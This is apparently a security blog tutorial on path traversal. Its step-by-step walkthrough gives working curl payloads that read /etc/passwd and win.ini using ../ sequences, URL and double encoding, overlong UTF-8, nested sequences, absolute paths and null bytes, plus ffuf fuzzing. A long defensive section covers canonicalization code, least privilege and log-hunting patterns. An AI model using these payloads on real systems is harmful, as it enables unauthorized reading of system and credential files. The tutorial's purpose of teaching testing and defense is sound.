Path Traversal: Escaping the Web Root with ../, Encoding Tricks, and Null Bytes

Web Exploitation
Time it takes to read this article 6 minutes.

Disclaimer: This article is for educational purposes and authorized security testing only. Run these techniques exclusively against systems you own or have explicit, written permission to test (e.g., a bug bounty scope or a signed engagement). Unauthorized access to computer systems is illegal in most jurisdictions.

Introduction / Overview

Path traversal (also called directory traversal or "dot-dot-slash") is one of the oldest and most reliable web vulnerabilities, and it still appears in modern applications, APIs, and even container orchestration tooling. It occurs when an application builds a filesystem path from user input without properly canonicalizing and validating it, letting an attacker step outside the intended base directory and read (or sometimes write) arbitrary files.

In this article you'll learn how the bug arises, how to exploit it with ../ sequences, how to defeat naive filters using encoding bypasses, absolute paths, and legacy null byte tricks, and — just as importantly — how a blue team detects and shuts it down. Path traversal maps to CWE-22 and MITRE ATT&CK technique T1083 (File and Directory Discovery) when used for reconnaissance.

How it works / Background

A vulnerable endpoint typically looks like this:

https://target.tld/download?file=report.pdf
Plaintext

Server-side pseudocode:

$base = "/var/www/app/files/";
$path = $base . $_GET['file'];   // no validation
readfile($path);
PHP

The string concatenation is the flaw. The .. token means "parent directory" on virtually every filesystem, so if the user supplies ../../../../etc/passwd, the resolved path becomes:

/var/www/app/files/../../../../etc/passwd  ->  /etc/passwd
Bash

Because each ../ cancels one directory level, enough of them will always reach the filesystem root, after which you append the absolute target. This differs from Local File Inclusion (LFI), where the file is executed or included rather than merely read — though the entry point is often identical.

Prerequisites / Lab setup

You only need a target with a file-handling parameter and a few CLI tools. Spin up a deliberately vulnerable lab so you can test safely:

# DVWA (Damn Vulnerable Web Application) via Docker
docker run --rm -it -p 8080:80 vulnerables/web-dvwa

# Or bWAPP, or OWASP Juice Shop for a modern Node.js target
docker run --rm -p 3000:3000 bkimminich/juice-shop
Bash

Tools used below: curl, ffuf for fuzzing, and Burp Suite for manual manipulation. Install ffuf:

go install github.com/ffuf/ffuf/v2@latest
Bash

Attack walkthrough / PoC

Step 1 — Baseline and confirm the parameter is file-backed

curl -s "http://localhost:8080/download?file=report.pdf" -o baseline.bin
# Compare a known-good fetch vs a missing file to learn error behavior
curl -si "http://localhost:8080/download?file=nope.pdf" | head -n 1
Bash

Step 2 — The classic ../ payload

On Linux, target /etc/passwd; on Windows, target C:\Windows\win.ini (or use forward slashes, which Windows accepts):

# Linux
curl -s "http://localhost:8080/download?file=../../../../../../etc/passwd"

# Windows backslash variant
curl -s "http://target.tld/download?file=..\\..\\..\\..\\windows\\win.ini"
Bash

Use plenty of ../ — extra sequences past the root are harmless, since /.. from / stays at /.

Step 3 — Encoding bypass when ../ is filtered

Many WAFs and home-grown filters strip the literal string ../. URL encoding the dot and slash often slips straight through, because the web server decodes the path after the filter runs:

# Single URL-encode:  ../  ->  %2e%2e%2f
curl -s "http://target.tld/download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

# Encode only the slash
curl -s "http://target.tld/download?file=..%2f..%2f..%2fetc%2fpasswd"
Bash

If the application decodes input twice (e.g., a proxy decodes once, the app once more), use double encoding, where % becomes %25:

# Double URL-encode:  ../  ->  %252e%252e%252f
curl -s "http://target.tld/download?file=%252e%252e%252fetc%252fpasswd"
Bash

Older IIS/Apache stacks were famously vulnerable to overlong UTF-8 encodings of the slash, the basis of the original "Unicode" attacks:

# Overlong UTF-8 for '/'  ->  %c0%af
curl -s "http://target.tld/scripts/..%c0%af..%c0%af..%c0%afwinnt/win.ini"
Bash

Another classic filter bypass: nested traversal sequences. If the filter does a single non-recursive replacement of ../ with empty, then ....// collapses back to ../:

curl -s "http://target.tld/download?file=....//....//....//etc/passwd"
Bash

Step 4 — Absolute path bypass

If the filter only blocks ../ but the code passes input directly to a file API, an absolute path sidesteps traversal entirely — no dot-dot needed:

curl -s "http://target.tld/download?file=/etc/passwd"
# Windows
curl -s "http://target.tld/download?file=C:/Windows/win.ini"
Bash

This works when the base directory is joined in a way that an absolute argument overrides it (e.g., many path.join/os.path.join implementations discard the prefix when the second component is absolute).

Step 5 — Null byte truncation (legacy)

Before PHP 5.3.4 (and in some C-based stacks), a null byte (%00) terminated the string at the OS layer, letting you strip a forced extension the app appended:

$path = $base . $_GET['file'] . ".pdf";   // app forces a .pdf suffix
PHP
# %00 cuts off the ".pdf" the server appends
curl -s "http://target.tld/download?file=../../../../etc/passwd%00.pdf"
Bash

This is patched in modern PHP, but still worth testing against legacy or embedded targets.

Step 6 — Automate the fuzzing

ffuf -u "http://target.tld/download?file=FUZZ" \
  -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
  -mr "root:.*:0:0:" -c
Bash

The -mr (match regex) flag flags responses containing the /etc/passwd signature, cutting through noise instantly.

Mermaid diagram

Path Traversal: Escaping the Web Root with ../, Encoding Tricks, and Null Bytes diagram 1

The diagram shows how a traversal payload either passes a missing filter or gets re-encoded to evade one, then gets canonicalized by the OS into a path outside the web root.

Detection & Defense (Blue Team)

Defense must be treated with the same rigor as the attack — a single missed canonicalization step reopens the hole.

1. Canonicalize, then validate. Resolve the path to its absolute form and confirm it still lives under the intended base directory after decoding. Never validate the raw string.

import os

BASE = os.path.realpath("/var/www/app/files")

def safe_path(user_input):
    candidate = os.path.realpath(os.path.join(BASE, user_input))
    # os.path.commonpath defeats prefix-tricks like /var/www/app/files-evil
    if os.path.commonpath([candidate, BASE]) != BASE:
        raise ValueError("Path traversal attempt")
    return candidate
Python

In Java, use getCanonicalPath() and verify startsWith(baseDir). In Node.js, use path.resolve() and check the result begins with the resolved base plus a separator.

2. Prefer indirection over filenames. Map user-supplied IDs to filenames via a whitelist/lookup table so raw paths never reach the filesystem: files = {1: "report.pdf"} then look up by integer ID.

3. Drop the file extension dependency and reject null bytes. Reject any input containing %00, raw 0x00, or control characters outright. Allowlist a strict character set (e.g., ^[A-Za-z0-9_-]+$) for filenames.

4. Least privilege. Run the web process under a low-privilege account with no read access outside the document root. Use chroot, containers, or AppArmor/SELinux profiles so even a successful traversal hits a wall. On Linux, an AppArmor profile denying reads of /etc/shadow and home directories sharply limits impact.

5. Detection. Tune your WAF (ModSecurity CRS rules 930100–930130 cover path traversal) and alert on these signatures in access logs:

# Hunt for traversal attempts in nginx/apache logs
grep -E "(\.\./|%2e%2e|%252e|%c0%af|\.\.\\\\|%00)" /var/log/nginx/access.log

# Count offending source IPs
awk '/\.\.%2f|\.\.\// {print $1}' access.log | sort | uniq -c | sort -rn
Bash

Map alerts to MITRE ATT&CK T1190 (Exploit Public-Facing Application) for ingress and T1083 for the discovery intent. Feed WAF blocks and 200-responses that returned root:x:0:0 patterns into your SIEM as high-severity detections.

For related server-side compromise paths, see LFI to RCE techniques and Server-Side Request Forgery. Once you have file read, pivot ideas live in post-exploitation enumeration.

Conclusion

Path traversal survives because developers keep concatenating untrusted input into filesystem paths and validating the wrong representation of that input. The offensive surface is broad — ../, single and double URL encoding, overlong UTF-8, nested ....//, absolute paths, and legacy null bytes — but the defense reduces to one principle: canonicalize first, then prove the result stays inside your base directory, and back that with least-privilege and good logging. Test every file-handling parameter; the bug is rarely where the marketing copy says the "file upload" feature lives.

References

Comments

Copied title and URL